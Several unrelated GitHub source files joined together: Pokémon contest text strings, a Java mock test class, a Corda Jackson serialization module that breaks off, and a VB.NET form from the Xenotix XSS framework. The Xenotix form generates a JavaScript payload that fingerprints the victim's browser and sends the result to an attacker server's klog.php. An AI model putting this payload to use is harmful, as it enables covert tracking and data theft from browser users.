before--good!{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_StoodOutMuchMoreThanMonBefore:: @ 827E17F .string "It stood out much more\n" .string "than the POKéMON before.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_DidntDoAsWellAsMonBefore:: @ 827E1BB .string "It didn't do as well as the\n" .string "POKéMON before.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MonsConditionRoseAboveUsual:: @ 827E1F3 .string "{STR_VAR_1}'s condition\n" .string "rose above usual.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MonsHotStatusMadeGreatAppeal:: @ 827E220 .string "{STR_VAR_1}'s hot status\n" .string "made it a great appeal!{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MovedUpInLineForNextAppeal:: @ 827E254 .string "It moved up in line for\n" .string "the next appeal.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MovedBackInLineForNextAppeal:: @ 827E289 .string "It moved back in line once\n" .string "for the next appeal.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_ScrambledUpOrderForNextTurn:: @ 827E2C5 .string "It scrambled up the\n" .string "order for the next turn.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_JudgeLookedAtMonExpectantly:: @ 827E2FE .string "The JUDGE looked at\n" .string "{STR_VAR_1} expectantly.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_AppealComboWentOverWell:: @ 827E32E .string "The appeal combo went\n" .string "over well.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_AppealComboWentOverVeryWell:: @ 827E35B .string "The appeal combo went\n" .string "over very well.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_AppealComboWentOverExcellently:: @ 827E38D .string "The appeal combo went\n" .string "over excellently.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_MonManagedToAvertGaze:: @ 827E3C1 .string "{STR_VAR_1} managed to\n" .string "avert its gaze.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_MonManagedToAvoidSeeingIt:: @ 827E3EB .string "{STR_VAR_1} managed to\n" .string 
"avoid seeing it.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_MonIsntFazedByThatSortOfThing:: @ 827E416 .string "{STR_VAR_1} isn't fazed\n" .string "by that sort of thing.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_MonBecameALittleDistracted:: @ 827E448 .string "{STR_VAR_1} became a\n" .string "little distracted.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_TriedToStartleOtherPokemon:: @ 827E473 .string "It tried to startle the\n" .string "other POKéMON.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_MonLookedDownOutOfDistraction:: @ 827E4A6 .string "{STR_VAR_1} looked down\n" .string "out of distraction.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_MonTurnedBackOutOfDistraction:: @ 827E4D5 .string "{STR_VAR_1} turned back\n" .string "out of distraction.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_MonCouldntHelpUtteringCry:: @ 827E504 .string "{STR_VAR_1} couldn't help\n" .string "uttering a cry.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_MonCouldntHelpLeapingUp:: @ 827E531 .string "{STR_VAR_1} couldn't help\n" .string "leaping up.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_MonTrippedOutOfDistraction:: @ 827E55A .string "{STR_VAR_1} tripped over\n" .string "out of distraction.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_MonWasTooNervousToMove:: @ 827E58A .string "{STR_VAR_1} was too\n" .string "nervous to move.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_ButItMessedUp2:: @ 827E5B2 .string "But it messed up.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_ButItFailedToMakeTargetNervous:: @ 827E5D0 .string "But it failed to make\n" .string "the target nervous.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_ButItFailedToMakeAnyoneNervous:: @ 827E606 .string "But it failed to make\n" .string "anyone nervous.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_ButItWasIgnored:: @ 827E638 .string "But it was ignored…{PAUSE 0x0F}{PAUSE 
0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_CouldntImproveItsCondition:: @ 827E658 .string "But it couldn't improve\n" .string "its condition…{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_BadConditionResultedInWeakAppeal:: @ 827E68B .string "Its bad condition\n" .string "resulted in a weak appeal.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_MonWasUnaffected:: @ 827E6C4 .string "{STR_VAR_1} was\n" .string "unaffected.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_RepeatedAppeal:: @ 827E6E3 .string "{STR_VAR_1} disappointed\n" .string "by repeating an appeal.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_MonsXWentOverGreat:: @ 827E717 .string "{STR_VAR_1}'s {STR_VAR_3}\n" .string "went over great.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_MonsXDidntGoOverWell:: @ 827E73C .string "{STR_VAR_1}'s {STR_VAR_3}\n" .string "didn't go over well here…{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_MonsXGotTheCrowdGoing:: @ 827E76A .string "{STR_VAR_1}'s {STR_VAR_3}\n" .string "got the crowd going.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_MonCantAppealNextTurn:: @ 827E793 .string "{STR_VAR_1} can't appeal\n" .string "next turn…{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_AttractedCrowdsAttention:: @ 827E7BA .string "It attracted the crowd's\n" .string "attention.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_CrowdContinuesToWatchMon:: @ 827E7EA .string "The crowd continues to\n" .string "watch {STR_VAR_3}.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_MonsMoveIsIgnored:: @ 827E817 .string "{STR_VAR_1}'s\n" .string "{STR_VAR_2} is ignored.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_Contest_Shyness:: @ 827E837 .string "shyness$" gText_Contest_Anxiety:: @ 827E83F .string "anxiety$" gText_Contest_Laziness:: @ 827E847 .string "laziness$" gText_Contest_Hesitancy:: @ 827E850 .string "hesitancy$" gText_Contest_Fear:: @ 827E85A .string "fear$" gText_Contest_Coolness:: 
@ 827E85F .string "coolness$" gText_Contest_Beauty:: @ 827E868 .string "beauty$" gText_Contest_Cuteness:: @ 827E86F .string "cuteness$" gText_Contest_Smartness:: @ 827E878 .string "smartness$" gText_Contest_Toughness:: @ 827E882 .string "toughness$" @ Unused gText_Tension:: @ 827E88C .string "TENSION$" gText_CoolMove:: @ 827E894 .string "COOL Move$" gText_BeautyMove:: @ 827E89E .string "BEAUTY Move$" gText_CuteMove:: @ 827E8AA .string "CUTE Move$" gText_SmartMove:: @ 827E8B4 .string "SMART Move$" gText_ToughMove:: @ 827E8BF .string "TOUGH Move$" gText_3QuestionMarks:: @ 827E8CA .string "???$"
{ "pile_set_name": "Github" }
' Xenotix XSS framework: browser info/fingerprint detector form.
'
' Button1 writes an "xss.js" payload next to the executable that runs the
' user-supplied fingerprinting JavaScript and posts its result (`ret`)
' back to the attack server; a timer then polls "logs.txt" for the
' captured data and renders it in the embedded WebBrowser control.
'
' NOTE(review): the designer fields referenced here (Button1, Button2,
' TextBox1, Timer1, WebBrowser1) and the sibling form `xss_server` are
' declared elsewhere in the project — presumably a WinForms designer
' partial class; confirm against the .Designer.vb file.
Imports System.IO

Public Class xss_info_browser_detector

    ' Start button: generate the fingerprinting payload and begin polling.
    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        On Error Resume Next ' NOTE(review): swallows every error, including file-write failures
        ' Random suffix so the injected <script> element id is unique per run.
        Dim ran = New Random()
        Dim tmp = ran.Next(300, 350)
        ' Emit the payload. Str(tmp) prepends a space to the number; harmless
        ' here because both write sites below build the id the same way.
        Dim stream As New IO.StreamWriter(Application.StartupPath & "\xss.js")
        stream.WriteLine("if (document.getElementById('xenotix_brfg" & Str(tmp) & "') == null){ ")
        stream.WriteLine(TextBox1.Text) ' user-supplied JS; expected to assign `ret`
        stream.WriteLine("new Image().src = 'http://" & xss_server.server_ip & "/klog.php?log='+ret;")
        stream.WriteLine(" script = document.createElement('script');script.id = 'xenotix_brfg" & Str(tmp) & "'; document.body.appendChild(script); }")
        stream.Close() ' NOTE(review): no Using block — leaks the handle if a write throws (masked by On Error)
        Button1.Enabled = False
        Timer1.Enabled = True ' start watching logs.txt for the callback
    End Sub

    ' Form load: hide the raw payload editor and clear any stale capture log.
    Private Sub xss_info_browser_fingerprint_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
        On Error Resume Next
        TextBox1.Visible = False
        IO.File.Delete("logs.txt")
    End Sub

    ' Close button: remove generated artifacts, then dismiss the form.
    Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
        On Error Resume Next
        IO.File.Delete("xss.js")
        IO.File.Delete("logs.txt")
        Me.Close()
    End Sub

    ' Poll timer: once logs.txt has content, render it and stop polling.
    Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
        On Error Resume Next
        Dim line As String = ""
        Dim readfile As System.IO.TextReader = New StreamReader(Application.StartupPath & "\logs.txt")
        line = readfile.ReadToEnd()
        If Not line = "" Then
            WebBrowser1.ScriptErrorsSuppressed = True
            WebBrowser1.DocumentText = line
            Timer1.Enabled = False
        End If
        readfile.Close() ' NOTE(review): not in a Using block; reader leaks on exception (masked by On Error)
        readfile = Nothing
    End Sub
End Class
{ "pile_set_name": "Github" }
/* * Copyright (C) 2006 TopCoder Inc., All Rights Reserved. */ package com.topcoder.util.actionmanager; import javax.swing.undo.UndoableEdit; /** * <p> * This class implements the UndoableEdit interface and used for testing only. * </p> * * @author biotrail * @version 1.0 */ public class MockUndoableEdit implements UndoableEdit { /** * <p> * This method implements the undo() method defined in the UndoableEdit interface. * </p> * * <p> * Empty method. * </p> */ public void undo() { // empty } /** * <p> * This method implements the canUndo() method defined in the UndoableEdit interface. * </p> * * <p> * This method always returns false. * </p> * * @return false */ public boolean canUndo() { return false; } /** * <p> * This method implements the redo() method defined in the UndoableEdit interface. * </p> * * <p> * Empty method. * </p> */ public void redo() { } /** * <p> * This method implements the canRedo() method defined in the UndoableEdit interface. * </p> * * <p> * This method always returns false. * </p> * * @return false */ public boolean canRedo() { return false; } /** * <p> * This method implements the die() method defined in the UndoableEdit interface. * </p> * * <p> * Empty method. * </p> */ public void die() { // empty } /** * <p> * This method implements the addEdit() method defined in the UndoableEdit interface. * </p> * * <p> * This method always returns false. * </p> * * @param anEdit anEdit * @return false */ public boolean addEdit(UndoableEdit anEdit) { return false; } /** * <p> * This method implements the replaceEdit() method defined in the UndoableEdit interface. * </p> * * <p> * This method always returns false. * </p> * * @param anEdit anEdit * @return false */ public boolean replaceEdit(UndoableEdit anEdit) { return false; } /** * <p> * This method implements the isSignificant() method defined in the UndoableEdit interface. * </p> * * <p> * This method always returns false. 
* </p> * * @return false */ public boolean isSignificant() { return false; } /** * <p> * This method implements the getPresentationName() method defined in the UndoableEdit interface. * </p> * * @return the presentation name */ public String getPresentationName() { return "MockUndoableEdit"; } /** * <p> * This method implements the getUndoPresentationName() method defined in the UndoableEdit interface. * </p> * * @return the undo presentation name */ public String getUndoPresentationName() { return "Undo:MockUndoableEdit"; } /** * <p> * This method implements the getRedoPresentationName() method defined in the UndoableEdit interface. * </p> * * @return the redo presentation name */ public String getRedoPresentationName() { return "Redo:MockUndoableEdit"; } }
{ "pile_set_name": "Github" }
@file:Suppress("DEPRECATION")

package net.corda.client.jackson.internal

import com.fasterxml.jackson.annotation.*
import com.fasterxml.jackson.annotation.JsonAutoDetect.Value
import com.fasterxml.jackson.annotation.JsonAutoDetect.Visibility
import com.fasterxml.jackson.annotation.JsonCreator.Mode.DISABLED
import com.fasterxml.jackson.annotation.JsonInclude.Include
import com.fasterxml.jackson.core.JsonGenerator
import com.fasterxml.jackson.core.JsonParseException
import com.fasterxml.jackson.core.JsonParser
import com.fasterxml.jackson.core.JsonToken
import com.fasterxml.jackson.databind.*
import com.fasterxml.jackson.databind.annotation.JsonDeserialize
import com.fasterxml.jackson.databind.annotation.JsonSerialize
import com.fasterxml.jackson.databind.cfg.MapperConfig
import com.fasterxml.jackson.databind.deser.BeanDeserializerModifier
import com.fasterxml.jackson.databind.deser.ContextualDeserializer
import com.fasterxml.jackson.databind.deser.std.DelegatingDeserializer
import com.fasterxml.jackson.databind.deser.std.FromStringDeserializer
import com.fasterxml.jackson.databind.introspect.AnnotatedClass
import com.fasterxml.jackson.databind.introspect.BasicClassIntrospector
import com.fasterxml.jackson.databind.introspect.POJOPropertiesCollector
import com.fasterxml.jackson.databind.module.SimpleModule
import com.fasterxml.jackson.databind.node.IntNode
import com.fasterxml.jackson.databind.node.ObjectNode
import com.fasterxml.jackson.databind.ser.BeanPropertyWriter
import com.fasterxml.jackson.databind.ser.BeanSerializerModifier
import com.fasterxml.jackson.databind.ser.std.StdScalarSerializer
import com.fasterxml.jackson.databind.ser.std.UUIDSerializer
import com.google.common.primitives.Booleans
import net.corda.client.jackson.JacksonSupport
import net.corda.core.contracts.*
import net.corda.core.crypto.*
import net.corda.core.crypto.PartialMerkleTree.PartialTree
import net.corda.core.flows.StateMachineRunId
import net.corda.core.identity.*
import net.corda.core.internal.DigitalSignatureWithCert
import net.corda.core.internal.createComponentGroups
import net.corda.core.node.NodeInfo
import net.corda.core.serialization.SerializeAsToken
import net.corda.core.serialization.SerializedBytes
import net.corda.core.serialization.deserialize
import net.corda.core.serialization.serialize
import net.corda.core.transactions.*
import net.corda.core.utilities.ByteSequence
import net.corda.core.utilities.NetworkHostAndPort
import net.corda.core.utilities.parseAsHex
import net.corda.core.utilities.toHexString
import net.corda.serialization.internal.AllWhitelist
import net.corda.serialization.internal.amqp.SerializerFactoryBuilder
import net.corda.serialization.internal.amqp.hasCordaSerializable
import net.corda.serialization.internal.amqp.registerCustomSerializers
import java.math.BigDecimal
import java.security.PublicKey
import java.security.cert.CertPath
import java.time.Instant
import java.util.*

/**
 * Jackson [SimpleModule] that wires up JSON (de)serialization support for Corda core types.
 *
 * It installs a class introspector and serializer/deserializer modifiers, then registers a
 * mix-in class for each supported Corda type. Each mix-in carries the Jackson annotations
 * (custom serializer/deserializer, creator, etc.) so the Corda classes themselves stay
 * annotation-free.
 */
class CordaModule : SimpleModule("corda-core") {
    override fun setupModule(context: SetupContext) {
        super.setupModule(context)

        // For classes which are annotated with CordaSerializable we want to use the same set of properties as the Corda serialisation scheme.
        // To do that we use CordaSerializableClassIntrospector to first turn on field visibility for these classes (the Jackson default is
        // private fields are not included) and then we use CordaSerializableBeanSerializerModifier to remove any extra properties that Jackson
        // might pick up.
        context.setClassIntrospector(CordaSerializableClassIntrospector(context))
        context.addBeanSerializerModifier(CordaSerializableBeanSerializerModifier())
        // Intercepts deserialization of Amount so string forms like "10 USD" still parse.
        context.addBeanDeserializerModifier(AmountBeanDeserializerModifier())

        context.setMixInAnnotations(PartyAndCertificate::class.java, PartyAndCertificateMixin::class.java)
        context.setMixInAnnotations(NetworkHostAndPort::class.java, NetworkHostAndPortMixin::class.java)
        context.setMixInAnnotations(CordaX500Name::class.java, CordaX500NameMixin::class.java)
        context.setMixInAnnotations(Amount::class.java, AmountMixin::class.java)
        context.setMixInAnnotations(AbstractParty::class.java, AbstractPartyMixin::class.java)
        context.setMixInAnnotations(AnonymousParty::class.java, AnonymousPartyMixin::class.java)
        context.setMixInAnnotations(Party::class.java, PartyMixin::class.java)
        context.setMixInAnnotations(PublicKey::class.java, PublicKeyMixin::class.java)
        context.setMixInAnnotations(ByteSequence::class.java, ByteSequenceMixin::class.java)
        // Both the concrete SHA256 class and the SecureHash base use the same mix-in.
        context.setMixInAnnotations(SecureHash.SHA256::class.java, SecureHashSHA256Mixin::class.java)
        context.setMixInAnnotations(SecureHash::class.java, SecureHashSHA256Mixin::class.java)
        context.setMixInAnnotations(SerializedBytes::class.java, SerializedBytesMixin::class.java)
        context.setMixInAnnotations(DigitalSignature.WithKey::class.java, ByteSequenceWithPropertiesMixin::class.java)
        context.setMixInAnnotations(DigitalSignatureWithCert::class.java, ByteSequenceWithPropertiesMixin::class.java)
        context.setMixInAnnotations(TransactionSignature::class.java, ByteSequenceWithPropertiesMixin::class.java)
        context.setMixInAnnotations(SignedTransaction::class.java, SignedTransactionMixin::class.java)
        context.setMixInAnnotations(WireTransaction::class.java, WireTransactionMixin::class.java)
        context.setMixInAnnotations(TransactionState::class.java, TransactionStateMixin::class.java)
        context.setMixInAnnotations(Command::class.java, CommandMixin::class.java)
        context.setMixInAnnotations(TimeWindow::class.java, TimeWindowMixin::class.java)
        context.setMixInAnnotations(PrivacySalt::class.java, PrivacySaltMixin::class.java)
        context.setMixInAnnotations(SignatureScheme::class.java, SignatureSchemeMixin::class.java)
        context.setMixInAnnotations(SignatureMetadata::class.java, SignatureMetadataMixin::class.java)
        context.setMixInAnnotations(PartialTree::class.java, PartialTreeMixin::class.java)
        context.setMixInAnnotations(NodeInfo::class.java, NodeInfoMixin::class.java)
        context.setMixInAnnotations(StateMachineRunId::class.java, StateMachineRunIdMixin::class.java)
    }
}

/**
 * Class introspector that, for any class marked @CordaSerializable, switches Jackson's field
 * visibility to ANY (Jackson's default excludes private fields) before property collection runs.
 */
private class CordaSerializableClassIntrospector(private val context: Module.SetupContext) : BasicClassIntrospector() {
    override fun constructPropertyCollector(
            config: MapperConfig<*>?,
            ac: AnnotatedClass?,
            type: JavaType,
            forSerialization: Boolean,
            mutatorPrefix: String?
    ): POJOPropertiesCollector {
        if (hasCordaSerializable(type.rawClass)) {
            // Adjust the field visibility of CordaSerializable classes on the fly as they are encountered.
            context.configOverride(type.rawClass).visibility = Value.defaultVisibility().withFieldVisibility(Visibility.ANY)
        }
        return super.constructPropertyCollector(config, ac, type, forSerialization, mutatorPrefix)
    }
}

/**
 * Serializer modifier that trims the property set of @CordaSerializable beans down to the
 * (non-calculated) properties the Corda AMQP serialization scheme would use, so the JSON view
 * matches the wire view. SerializeAsToken classes are excluded from this trimming.
 */
private class CordaSerializableBeanSerializerModifier : BeanSerializerModifier() {
    // We need to pass in a SerializerFactory when scanning for properties, but don't actually do any serialisation so any will do.
    private val serializerFactory = SerializerFactoryBuilder.build(AllWhitelist, javaClass.classLoader).also { registerCustomSerializers(it) }

    override fun changeProperties(config: SerializationConfig,
                                  beanDesc: BeanDescription,
                                  beanProperties: MutableList<BeanPropertyWriter>): MutableList<BeanPropertyWriter> {
        val beanClass = beanDesc.beanClass
        if (hasCordaSerializable(beanClass) && !SerializeAsToken::class.java.isAssignableFrom(beanClass)) {
            val typeInformation = serializerFactory.getTypeInformation(beanClass)
            // Keep only the non-calculated AMQP properties; drop anything extra Jackson found.
            val propertyNames = typeInformation.propertiesOrEmptyMap.mapNotNull {
                if (it.value.isCalculated) null else it.key
            }
            beanProperties.removeIf { it.name !in propertyNames }
        }
        return beanProperties
    }
}

@ToStringSerialize
@JsonDeserialize(using = NetworkHostAndPortDeserializer::class)
private interface NetworkHostAndPortMixin

// Parses a "host:port" string back into a NetworkHostAndPort.
private class NetworkHostAndPortDeserializer : SimpleDeserializer<NetworkHostAndPort>({ NetworkHostAndPort.parse(text) })

@JsonSerialize(using = PartyAndCertificateSerializer::class)
// TODO Add deserialization which follows the same lookup logic as Party
private interface PartyAndCertificateMixin

/**
 * Serializes a PartyAndCertificate either as name + cert path (when the mapper is configured
 * with isFullParties) or, otherwise, as just the underlying Party.
 */
private class PartyAndCertificateSerializer : JsonSerializer<PartyAndCertificate>() {
    override fun serialize(value: PartyAndCertificate, gen: JsonGenerator, serializers: SerializerProvider) {
        val mapper = gen.codec as JacksonSupport.PartyObjectMapper
        if (mapper.isFullParties) {
            gen.writeObject(PartyAndCertificateJson(value.name, value.certPath))
        } else {
            gen.writeObject(value.party)
        }
    }
}

// JSON shape used by PartyAndCertificateSerializer in "full parties" mode.
private class PartyAndCertificateJson(val name: CordaX500Name, val certPath: CertPath)

@JsonSerialize(using = SignedTransactionSerializer::class)
@JsonDeserialize(using = SignedTransactionDeserializer::class)
private interface SignedTransactionMixin

/**
 * Serializes a SignedTransaction as a StxJson wrapper with exactly one core-transaction field
 * populated (chosen by the concrete CoreTransaction subtype) plus the signature list.
 */
private class SignedTransactionSerializer : JsonSerializer<SignedTransaction>() {
    override fun serialize(value: SignedTransaction, gen: JsonGenerator, serializers: SerializerProvider) {
        val core = value.coreTransaction
        val stxJson = when (core) {
            is WireTransaction -> StxJson(wire = core, signatures = value.sigs)
            is FilteredTransaction -> StxJson(filtered = core, signatures = value.sigs)
            is NotaryChangeWireTransaction -> StxJson(notaryChangeWire = core, signatures = value.sigs)
            is ContractUpgradeWireTransaction -> StxJson(contractUpgradeWire = core, signatures = value.sigs)
            is ContractUpgradeFilteredTransaction -> StxJson(contractUpgradeFiltered = core, signatures = value.sigs)
            else -> throw IllegalArgumentException("Don't know about ${core.javaClass}")
        }
        gen.writeObject(stxJson)
    }
}

/**
 * Rebuilds a SignedTransaction from StxJson by taking whichever single core-transaction field
 * is non-null (StxJson's init guarantees exactly one is set).
 */
private class SignedTransactionDeserializer : JsonDeserializer<SignedTransaction>() {
    override fun deserialize(parser: JsonParser, ctxt: DeserializationContext): SignedTransaction {
        val wrapper = parser.readValueAs<StxJson>()
        val core = wrapper.run { wire ?: filtered ?: notaryChangeWire ?: contractUpgradeWire ?: contractUpgradeFiltered!! }
        return SignedTransaction(core, wrapper.signatures)
    }
}

/**
 * JSON wrapper for SignedTransaction. Exactly one of the transaction fields must be non-null;
 * the init block enforces this with a count over all five variants.
 */
@JsonInclude(Include.NON_NULL)
private data class StxJson(
        val wire: WireTransaction? = null,
        val filtered: FilteredTransaction? = null,
        val notaryChangeWire: NotaryChangeWireTransaction? = null,
        val contractUpgradeWire: ContractUpgradeWireTransaction? = null,
        val contractUpgradeFiltered: ContractUpgradeFilteredTransaction? = null,
        val signatures: List<TransactionSignature>
) {
    init {
        val count = Booleans.countTrue(wire != null, filtered != null, notaryChangeWire != null, contractUpgradeWire != null, contractUpgradeFiltered != null)
        require(count == 1) { this }
    }
}

@JsonSerialize(using = WireTransactionSerializer::class)
@JsonDeserialize(using = WireTransactionDeserializer::class)
private interface WireTransactionMixin

// Flattens a WireTransaction into the WireTransactionJson record below.
private class WireTransactionSerializer : JsonSerializer<WireTransaction>() {
    override fun serialize(value: WireTransaction, gen: JsonGenerator, serializers: SerializerProvider) {
        gen.writeObject(WireTransactionJson(
                value.id,
                value.notary,
                value.inputs,
                value.outputs,
                value.commands,
                value.timeWindow,
                value.attachments,
                value.references,
                value.privacySalt,
                value.networkParametersHash
        ))
    }
}

/**
 * Rebuilds a WireTransaction from WireTransactionJson by reconstructing the component groups
 * and reusing the recorded privacy salt. Note the JSON `id` field is not consumed here — the
 * id is recomputed by WireTransaction itself.
 */
private class WireTransactionDeserializer : JsonDeserializer<WireTransaction>() {
    override fun deserialize(parser: JsonParser, ctxt: DeserializationContext): WireTransaction {
        val wrapper = parser.readValueAs<WireTransactionJson>()
        val componentGroups = createComponentGroups(
                wrapper.inputs,
                wrapper.outputs,
                wrapper.commands,
                wrapper.attachments,
                wrapper.notary,
                wrapper.timeWindow,
                wrapper.references,
                wrapper.networkParametersHash
        )
        return WireTransaction(componentGroups, wrapper.privacySalt)
    }
}

// Flat JSON projection of a WireTransaction's components.
private class WireTransactionJson(val id: SecureHash,
                                  val notary: Party?,
                                  val inputs: List<StateRef>,
                                  val outputs: List<TransactionState<*>>,
                                  val commands: List<Command<*>>,
                                  val timeWindow: TimeWindow?,
                                  val attachments: List<SecureHash>,
                                  val references: List<StateRef>,
                                  val privacySalt: PrivacySalt,
                                  val networkParametersHash: SecureHash?)

// Embeds the concrete class name so polymorphic state/constraint types round-trip.
private interface TransactionStateMixin {
    @get:JsonTypeInfo(use = JsonTypeInfo.Id.CLASS)
    val data: ContractState
    @get:JsonTypeInfo(use = JsonTypeInfo.Id.CLASS)
    val constraint: AttachmentConstraint
}

// Embeds the concrete CommandData class name for polymorphic round-tripping.
private interface CommandMixin {
    @get:JsonTypeInfo(use = JsonTypeInfo.Id.CLASS)
    val value: CommandData
}

@JsonDeserialize(using = TimeWindowDeserializer::class)
private interface TimeWindowMixin

/**
 * Reconstructs a TimeWindow from its fromTime/untilTime pair, picking the matching factory
 * (between / fromOnly / untilOnly) and failing if neither bound is present.
 */
private class TimeWindowDeserializer : JsonDeserializer<TimeWindow>() {
    override fun deserialize(parser: JsonParser, ctxt: DeserializationContext): TimeWindow {
        return parser.readValueAs<TimeWindowJson>().run {
            when {
                fromTime != null && untilTime != null -> TimeWindow.between(fromTime, untilTime)
                fromTime != null -> TimeWindow.fromOnly(fromTime)
                untilTime != null -> TimeWindow.untilOnly(untilTime)
                else -> throw JsonParseException(parser, "Neither fromTime nor untilTime exists for TimeWindow")
            }
        }
    }
}

// JSON shape for TimeWindow; either bound may be absent (but not both — see deserializer).
private data class TimeWindowJson(val fromTime: Instant?, val untilTime: Instant?)

@JsonSerialize(using = PrivacySaltSerializer::class)
@JsonDeserialize(using = PrivacySaltDeserializer::class)
private interface PrivacySaltMixin

// PrivacySalt round-trips as a hex string of its bytes.
private class PrivacySaltSerializer : JsonSerializer<PrivacySalt>() {
    override fun serialize(value: PrivacySalt, gen: JsonGenerator, serializers: SerializerProvider) {
        gen.writeString(value.bytes.toHexString())
    }
}

private class PrivacySaltDeserializer : SimpleDeserializer<PrivacySalt>({ PrivacySalt(text.parseAsHex()) })

// TODO Add a lookup function by number ID in Crypto
private val signatureSchemesByNumberID = Crypto.supportedSignatureSchemes().associateBy { it.schemeNumberID }

@JsonSerialize(using = SignatureMetadataSerializer::class)
@JsonDeserialize(using = SignatureMetadataDeserializer::class)
private interface SignatureMetadataMixin

/**
 * Writes SignatureMetadata as {platformVersion, scheme}. The scheme is written as the full
 * SignatureScheme object when the number ID is known, otherwise as the raw number ID.
 */
private class SignatureMetadataSerializer : JsonSerializer<SignatureMetadata>() {
    override fun serialize(value: SignatureMetadata, gen: JsonGenerator, serializers: SerializerProvider) {
        gen.jsonObject {
            writeNumberField("platformVersion", value.platformVersion)
            writeObjectField("scheme", value.schemeNumberID.let { signatureSchemesByNumberID[it] ?: it })
        }
    }
}

/**
 * Reads SignatureMetadata back, accepting the scheme either as an int (the number ID) or as a
 * textual scheme code name resolved via Crypto.findSignatureScheme.
 */
private class SignatureMetadataDeserializer : JsonDeserializer<SignatureMetadata>() {
    override fun deserialize(parser: JsonParser, ctxt: DeserializationContext): SignatureMetadata {
        val json = parser.readValueAsTree<ObjectNode>()
        val scheme = json["scheme"]
        val schemeNumberID = if (scheme is IntNode) {
            scheme.intValue()
        } else {
            Crypto.findSignatureScheme(scheme.textValue()).schemeNumberID
        }
        return SignatureMetadata(json["platformVersion"].intValue(), schemeNumberID)
    }
}

@JsonSerialize(using = PartialTreeSerializer::class)
@JsonDeserialize(using = PartialTreeDeserializer::class)
private interface PartialTreeMixin

// Recursively converts a PartialTree into the nullable-field PartialTreeJson shape.
private class PartialTreeSerializer : JsonSerializer<PartialTree>() {
    override fun serialize(value: PartialTree, gen: JsonGenerator, serializers: SerializerProvider) {
        gen.writeObject(convert(value))
    }

    private fun convert(tree: PartialTree): PartialTreeJson {
        return when (tree) {
            is PartialTree.IncludedLeaf -> PartialTreeJson(includedLeaf = tree.hash)
            is PartialTree.Leaf -> PartialTreeJson(leaf = tree.hash)
            is PartialTree.Node -> PartialTreeJson(left = convert(tree.left), right = convert(tree.right))
            else -> throw IllegalArgumentException("Don't know how to serialize $tree")
        }
    }
}

// Inverse of PartialTreeSerializer: rebuilds the tree from nested PartialTreeJson nodes.
private class PartialTreeDeserializer : JsonDeserializer<PartialTree>() {
    override fun deserialize(parser: JsonParser, ctxt: DeserializationContext): PartialTree {
        return convert(parser.readValueAs(PartialTreeJson::class.java))
    }

    private fun convert(wrapper: PartialTreeJson): PartialTree {
        return wrapper.run {
            when {
                includedLeaf != null -> PartialTree.IncludedLeaf(includedLeaf)
                leaf != null -> PartialTree.Leaf(leaf)
